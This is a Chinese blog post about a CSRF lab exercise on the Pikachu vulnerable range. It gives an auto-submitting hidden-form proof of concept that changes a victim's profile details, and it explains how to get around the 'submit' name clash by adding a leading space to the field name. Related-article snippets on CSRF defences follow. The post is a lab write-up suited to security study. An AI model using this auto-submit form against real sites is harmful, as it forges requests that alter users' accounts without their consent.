csrf测试name=submit与submit()冲突导致无法自动提交表单的解决方法

最新推荐文章于 2023-02-14 12:17:55 发布
最新推荐文章于 2023-02-14 12:17:55 发布
阅读量649 收藏 3
点赞数 1
分类专栏: 安全 文章标签: csrf webview 前端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/hrayha/article/details/122017665
版权

pikachu靶场环境中,post的csrf在参数中有一个submit=submit,开始poc如下

<html>
  <body>
    <form action="http://127.0.0.1/vul/csrf/csrfpost/csrf_post_edit.php" method="POST">
      <input type="hidden" name="sex" value="girl" />
      <input type="hidden" name="phonenum" value="18656565545" />
      <input type="hidden" name="add" value="usa" />
      <input type="hidden" name="email" value="zhangsan@pikachu.com" />
      <input type="hidden" name="submit" value="submit" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>

但是自动提交表单失败,一番搜索后发现是name="submit"这里与submit()冲突了,开始想的是利用url编码,把name="submit"改成name="%73ubmit",burp中发送是可行的,但是实际测试中因为Content-Type: application/x-www-form-urlencoded,把%做了编码,%73ubmit变成了%2573ubmit,最后发现可以在submit前加空格解决,变成name=" submit",最终poc如下

<html>
  <body>
    <form action="http://127.0.0.1/vul/csrf/csrfpost/csrf_post_edit.php" method="POST">
      <input type="hidden" name="sex" value="girl" />
      <input type="hidden" name="phonenum" value="18656565545" />
      <input type="hidden" name="add" value="usa" />
      <input type="hidden" name="email" value="zhangsan@pikachu.com" />
      <input type="hidden" name=" submit" value="submit" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>

顺便说下,测试过程中发现chrome浏览器在请求的时候不会携带cookie信息了,还没搞清楚是哪条安全策略导致的,最后使用猎豹浏览器测试成功 

hrayha
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
解决Django提交报错:CSRF token missing or incorrect的问题
12-20
当用户提交时,Django会检查中提供的CSRF令牌是否与Cookie中的令牌匹配,如果匹配,则认为请求是安全的,否则会抛出"CSRF token missing or incorrect"的错误。 解决这个错误的方法通常涉及以下几个步骤: ...
pikachu CSRF(跨站请求伪造) (皮卡丘漏洞平台通关系列)
箭雨镜屋
04-14 7860
一、官方介绍 本节引用内容来自pikachu漏洞平台(删了一些内容,留下了最重要的部分,并为精炼语言进行了一些修改) 1、我们判断一个网站是否存在CSRF漏洞,其实就是判断其对关键信息(比如密码等敏感信息)的操作(增删改)是否容易被伪造。 2、本质是借用户的权限完成攻击,因此攻击成功需要用户已经通过验证获得了权限,并触发了攻击者提供的请求。 3、网站如果要防止CSRF攻击,则需要对敏感信息的操作实施对应的安全措施,防止这些操作出现被伪造的情况,从而导致CSRF。比如: --对敏感信息的操作增加安全
<input type="submit" name="Submit" value="提交" />添加网站跳转的两种方式小结
热门推荐
budaoweng0609的博客
01-30 1万+
两种方法:一种是 本身在一个form里面,添加action就可以,比如,像这样子,另外一种很少使用在submit属性的按钮上,不过不是不行,你可以添加一个onclick,比如window.location.href='index.html'” value="提交" /> 此种方法要注意意看清引号的问题别搞错了 例如: name: passwor
仅仅因为提交按钮的name='submit'引起的bug
weixin_33857230的博客
02-22 169
2019独角兽企业重金招聘Python工程师标准>>> ...
pikachu-CSRF(跨站请求伪造)
a1245678899的博客
11-10 583
Cross-site request forgery 简称为“CSRF”,在CSRF的攻击场景中攻击者会伪造一个请求(这个请求一般是一个链接),然后欺骗目标用户进行点击,用户一旦点击了这个请求,整个攻击就完成了。点击修改个人信息然后使用burpsuite抓包可以看到这个数据的传输过程是get型,数据包含在URL之中直接在URL之中构造包含自己信息的网址,伪造一下,诱导用户去点击。当链接被点击以后,可以看到信息已经被修改。
Pikachu靶场之CSRF漏洞详解
m0_46467017的博客
05-16 7605
Pikachu靶场之XSS漏洞详解前言漏洞简述CSRF是什么CSRF攻击原理CSRF攻击防护如何确认一个web系统存在CSRF漏洞第1关 CSRF(get)第2关 CSRF(post)第三关 CSRF Tokentoken验证原理其他防范措施 前言 本篇文章用于巩固对自己csrf漏洞的学习总结,其中部分内容借鉴了以下博客。 链接: pikachu CSRF(跨站请求伪造) (皮卡丘漏洞平台通关系列) 链接: Pikachu漏洞靶场系列之CSRF 漏洞简述 CSRF是什么 CSRF全称为跨站请求伪造(Cro
PHP+Session防止重复提交解决方法
12-20
这种方法可以防止CSRF(跨站请求伪造)攻击,因为攻击者无法获取到中的Token。 总之,使用PHP+Session或者结合Token可以有效防止的重复提交,确保数据的一致性和完整性。这两种方法都是通过在服务器端维护...
Ajax提交时验证码自动验证 php后端验证码检测
12-18
在本文中,我们将探讨如何实现在Ajax提交时,前端先进行验证码的自动验证,如果验证通过再将数据发送到后端。这个过程能够提高用户体验,因为用户不必等待整个提交后再得知验证码是否正确。我们将分析前端...
关于django 1.10 CSRF验证失败的解决方法
09-18
Django 的 CSRF 验证是用于保护 Web 应用程序免受跨站请求伪造(Cross-Site Request Forgery,简称 CSRF)攻击的一种机制。CSRF 攻击通常发生在用户已登录一个网站并持有有效会话(如 Cookie)的情况下,攻击者通过...
PHP 提交给自己
10-30
<input type="submit" name="submit" value="submit me!"> } ?> ``` 在这个例子中,当用户提交时,`$_POST['action']`变量会被设置为'submitted'。我们通过`isset()`函数检查这个变量是否存在,如果存在,则...
submit事件监听问题
lee_master的博客
05-22 3019
保存数据时需要先对格中数据进行处理,然后再提交保存,保存按钮如下: <input id="btnSubmit" class="btn btn-primary" type="submit" value="保 存"/> 发现input标签包含onsubmit属性,因此尝试使用onsubmit进行事件处理,但是绑定之后并没有产生响应,后又尝试将type值改为button进行尝试。 ...
(29.1)【CSRF详解】CSRF原理、利用过程、分类、举例、工具……
04-06 9714
一个细节都不不想放过
提交最常遇到的坑之csrf验证
little_spice的博客
07-30 2226
一说起laravel的提交,如果遇到坑,第一反应就是没有加入csrf,这个是绝大多数新手的必经之路!! 加csrf的方式多种多样,一开始比较复杂,后面越来越简,可以直接用{{csrf_field()}}或者@csrf(我的版本是laravel5.6更早的版本请用hidden方式,自己查一下吧,记不太清了)。加入的位置是form的下面 <form action="" m...
burpsuite靶场——CSRF
qq_61768489的博客
12-26 1623
跨站点请求伪造(也称为 CSRF)是一种网络安全漏洞,允许攻击者诱使用户执行他们不打算执行的操作。它允许攻击者部分规避同源策略,该策略旨在防止不同网站相互干扰。
CSRF攻击分析】
qq_55213436的博客
06-09 2392
目录一、什么是CSRF漏洞二、CSRF漏洞的原理和利用过程 三、CSRF漏洞的检测方法四、攻击利用姿势五、防护手段 CSRF即跨站点请求伪造(Cross—Site Request Forgery),跟XSS攻击一样,存在巨大的危害性,可以这样来理解: 你登录某个网站,攻击者盗用了你的身份,以你的名义发送恶意请求,对服务器来说这个请求是完全合法的,但是却完成了攻击者所期望的一个操作,比如以你的名义发送邮件、发消息,盗取你的账号,添加系统管理员,甚至于购买商品、虚拟货币转账等。 一个经典的cs
学学CSRF攻击的原理与防范
qq_53058639的博客
02-14 218
攻击者盗用了你的身份,以你的名义发送恶意请求。CSRF能够做的事情包括:以你名义发送邮件,发消息,盗取你的账号,甚至于购买商品,虚拟货币转账......造成的问题包括:个人隐私泄露以及财产安全。
CSRF(1)-----定义,原理和防护-----from提交数据
Z_Grant的博客
09-22 1584
文章目录一,定义和原理(1)与XSS不同之处(2)CSRF实现的基础前提(3)????CSRF的危害(4)CSRF的利用条件(5)????为什么会有CSRF二,cookie与CSRF(1)浏览器所持有的cookie分为两种:(2)区别(3)与CSRF的关系三,漏洞利用(1)通过GET请求方式发起(2)只能由GET请求发起? 一,定义和原理 CSRF(Cross Site Request Forgery, 跨...
重复提交解决方案(防止模拟Http请求CSRF)
zp的博客
09-02 5509
引发重复提交的一些场景: 网络延时  在平时开发中,如果网速比较慢的情况下,用户提交后,发现服务器半天都没有响应,那么用户可能会以为是自己没有提交,就会再点击提交按钮重复提交,我们在开发中必须防止重复提交。 重新刷新 提交后用户点击【刷新】按钮导致重复提交 点击浏览器的【后退】按钮回退到页面后进行再次提交 用户提交后,点击浏览器的【后退】按钮回退到...
form提交自动提交
qq_42728930的博客
05-13 672
先说一下作者遇到的问题,本地开发测试都可以完美运行,一到线上就开始ajax请求浏览器给cancel,虽然这个请求cancel了,但是controller里的代码执行了 控制器代码: public function edit_index_article(){ $old_id = $_POST['old_id']; //加上新的 $id = intval($_POST['new_id']); $sort = intval($_POST['sort'
php 模拟访问csrf,详解php curl带有csrf-token验证模拟提交方法
最新发布
06-02
CSRF(Cross-Site Request Forgery)攻击是指攻击者通过伪造用户的身份,向服务器发送恶意请求。这种攻击可以导致多种问题,比如修改用户密码、发送恶意邮件等。为了防止这种攻击,许多网站会采用CSRF-Token验证方式。 PHP提供了curl库,可以用来模拟访问网站。下面是详解php curl带有csrf-token验证模拟提交方法的步骤: 1.首先,获取CSRF-Token。通常情况下,网站会在登录时生成并存储一个CSRF-Token。可以通过curl模拟登录,并从响应中获取CSRF-Token。 2.使用curl发送POST请求时,需要在请求头中添加CSRF-Token。可以使用curl提供的curl_setopt函数设置请求头中的CSRF-Token。 3.发送POST请求时,需要将数据编码为URL格式。可以使用curl提供的curl_setopt函数设置POST数据,并使用http_build_query函数将数据编码为URL格式。 下面是一个示例代码: ``` // 模拟登录获取csrf-token $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, 'http://example.com/login'); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query(['username' => 'test', 'password' => 'test'])); $result = curl_exec($ch); preg_match('/<meta name="csrf-token" content="(.*)">/', $result, $matches); $csrfToken = $matches[1]; // 模拟提交数据 $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, 'http://example.com/submit'); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query(['data' => 'test'])); curl_setopt($ch, CURLOPT_HTTPHEADER, ['X-CSRF-Token: ' . $csrfToken]); $result = curl_exec($ch); ``` 在上面的代码中,首先模拟登录获取csrf-token,然后模拟提交数据时,在请求头中添加了CSRF-Token,并将数据编码为URL格式。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值